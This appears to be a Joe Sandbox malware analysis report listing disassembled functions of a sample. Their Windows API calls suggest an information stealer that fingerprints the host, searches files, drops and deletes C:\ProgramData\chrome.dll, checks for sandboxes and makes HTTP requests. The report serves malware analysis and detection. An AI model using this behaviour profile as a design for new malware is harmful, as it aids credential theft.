Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID: aA
API String ID: 2204142833-2414573348
Opcode ID: 8115a87f331c5bf0316648878c871bb56bc071665f0b8408b5bfacf79256e7c5
Instruction ID: 4f79722ab1709daed6719e9a1a5ed0a8a89ced1591e892962b9c5cf472760468
Opcode Fuzzy Hash: 8115a87f331c5bf0316648878c871bb56bc071665f0b8408b5bfacf79256e7c5
Instruction Fuzzy Hash: 9872ED72D15058AACB19FB91ECA1EEE733DAF10314F5042DFB11662056EF343B98CA69

Function 00416D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02D1E098,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
CloseHandle.KERNEL32(00000000), ref: 00416D99
Sleep.KERNEL32(00001770), ref: 00416DA4
CloseHandle.KERNEL32(?,00000000,?,02D1E098,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
ExitProcess.KERNEL32 ref: 00416DC2

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B

Function 00415440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02D27178), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02D26910,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478

Strings

ERROR, xrefs: 0041546A
ERROR, xrefs: 004154C3

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: c5e6bf4cdc1e0bd352a8657367e2998f62e30ef49764b98818f2a027c6ebd4a0
Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
Opcode Fuzzy Hash: c5e6bf4cdc1e0bd352a8657367e2998f62e30ef49764b98818f2a027c6ebd4a0
Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E

Function 004152A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
lstrcatA.KERNEL32(?,02D25910), ref: 004152F8

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Strings

9dA, xrefs: 0041531F, 00415344, 00415322

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID: 9dA
API String ID: 2699682494-3568425128
Opcode ID: eb8ca2ad7b36d4f5f7d581b824009ed308ff0e12df2c704d49b36ebc6daf99ec
Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
Opcode Fuzzy Hash: eb8ca2ad7b36d4f5f7d581b824009ed308ff0e12df2c704d49b36ebc6daf99ec
Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5

Function 00413E2B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
FindNextFileA.KERNELBASE(000000FF,?), ref: 00413EB7
FindClose.KERNEL32(000000FF), ref: 00413ECC

Strings

q?A, xrefs: 00413ED2

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Find$CloseFileNextlstrcat
String ID: q?A
API String ID: 3840410801-4084695119
Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55

Function 004108ED Relevance: 4.7, APIs: 3, Instructions: 223fileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02D1E258), ref: 00410922
StrCmpCA.SHLWAPI(00000000,02D1E1B8), ref: 00410B79
StrCmpCA.SHLWAPI(00000000,02D1E118), ref: 00410A0C

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: DeleteFilelstrcpy
String ID:
API String ID: 273707478-0
Opcode ID: 08ac232684421e03f534df1e844e54d2bd2c1cd9915a35dcde3887880414162b
Instruction ID: 55ebfe5bea072269aba33a565d8c59cbe62f1375a0798b8cb4aa3666f491b8e5
Opcode Fuzzy Hash: 08ac232684421e03f534df1e844e54d2bd2c1cd9915a35dcde3887880414162b
Instruction Fuzzy Hash: EA916471B001089FCB18EF65DA95EED77B6EF94304F10816EE40A9F391DB349A49CB86

Function 00419850 Relevance: 4.5, APIs: 3, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
WriteFile.KERNEL32(000000FF,004108DC,?,004108DC,00000000,?,004108DC), ref: 004198A3

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: fafa1b3cbb4ca0353c73aa922dda34af4ed3af59c00a9333f92be9f54491ab6e
Instruction ID: c00870ae4f46cd9ec0fbaadc8d13ab59566e93f84a6b66ec8604c729da6f8a20
Opcode Fuzzy Hash: fafa1b3cbb4ca0353c73aa922dda34af4ed3af59c00a9333f92be9f54491ab6e
Instruction Fuzzy Hash: BE11C830A08248BBDB10EFA0DC15BDE7B795F05314F044199F655A72C1DB346B45C7DA

Function 00417A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2

Function 00419600 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
CloseHandle.KERNEL32(00000000), ref: 0041963F

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
Instruction ID: 8add19ce2c94a4db983c162c5ea883653429c1f160fd421327fd5bffa921fc45
Opcode Fuzzy Hash: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
Instruction Fuzzy Hash: 95F03A7490120CEFDB14DBA4DD4AFEA7778BB08300F004599FA1997280E6B06E84CB95

Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
ExitProcess.KERNEL32 ref: 00401143

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D

Function 00406C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 00406CEF

Strings

@, xrefs: 00406CC9

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
Instruction ID: 960187402ee01aff1aca01ef16381d87fa4c626a1601440f33a421b94010635f
Opcode Fuzzy Hash: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
Instruction Fuzzy Hash: D6213374A04208EFDB04CF88D544BADBBB1FF48304F1181AAD456AB381D3799A91DF85

Function 00406D90 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
Instruction ID: fd8884a5b4d1e95754380b5432cffff504e2d4d7245242e6cdc6148b35b0e1b4
Opcode Fuzzy Hash: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
Instruction Fuzzy Hash: 816127B4900209DFCB14CF94E944BEEB7B0BB48304F1185AAE80677380D779AEA5DF95

Function 00414E00 Relevance: 3.1, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414E3A
lstrcatA.KERNEL32(?,02D26138), ref: 00414E58

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,02D27088,?,000003E8), ref: 00414C9A
